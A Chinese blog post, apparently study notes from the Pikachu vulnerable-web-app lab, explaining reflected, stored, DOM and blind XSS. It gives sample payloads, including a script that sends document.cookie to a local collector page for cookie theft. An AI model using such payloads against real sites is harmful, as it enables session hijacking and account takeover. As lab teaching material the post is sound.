网安-XSS-pikachu

介绍

XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码),当信任此Web服务器的用户访问

Web站点中含有恶意脚本代码的页面,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。

XSS分类一般如下:

1.反射型XSS

2.存储型XSS

3.DOM型XSS

1.反射型XSS,非持久性XSS

alert(document.cookie) //弹出当前cookie

2.存储型XSS,持久性XSS,JS代码会存在后台

3.DOM型XSS也是一种反射型,但是输入的语句不是JS的语句,是DOM语法

'"><img onerror=alert(0) src=><"'

利用XSS进行攻击:

攻击方:

找到存储cookie的url:http://localhost/pikachu/pkxss/xssmanager.php/xcookie/cookie.php

编辑攻击代码:

<script>

document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;

</script>

用户访问留言板,攻击方就收集到用户的cookie 了

4.XSS盲打

攻击的注入点(用户提交数据的页面)和显示点(管理员查看数据的页面)不同。

输入的内容不会在前端输出,而是提交到了后台。

管理员登录后台管理界面,可能遭受到XSS攻击。

5.XSS过滤

<script>

alert(document.cookie)

</script>

相关推荐
Danny_FD9 分钟前
Vue + Element UI 实现模糊搜索自动补全
前端·javascript
gnip14 分钟前
闭包实现一个简单Vue3的状态管理
前端·javascript
斐济岛上有一只斐济19 分钟前
后端程序员的CSS复习
前端
Enddme22 分钟前
《面试必问!JavaScript 中this 全方位避坑指南 (含高频题解析)》
前端·javascript·面试
有梦想的程序员23 分钟前
微信小程序使用 Tailwind CSS version 3
前端
pingao14137829 分钟前
雨雪雾冰全预警:交通气象站为出行安全筑起“隐形防护网”
安全
溟洵1 小时前
Qt 窗口 工具栏QToolBar、状态栏StatusBar
开发语言·前端·数据库·c++·后端·qt
用户2519162427111 小时前
Canvas之图像合成
前端·javascript·canvas
每天开心1 小时前
噜噜旅游App(4)——构建旅游智能客服模块,实现AI聊天
前端·微信小程序·前端框架
超凌1 小时前
el-input-number出现的点击+-按钮频现不生效
前端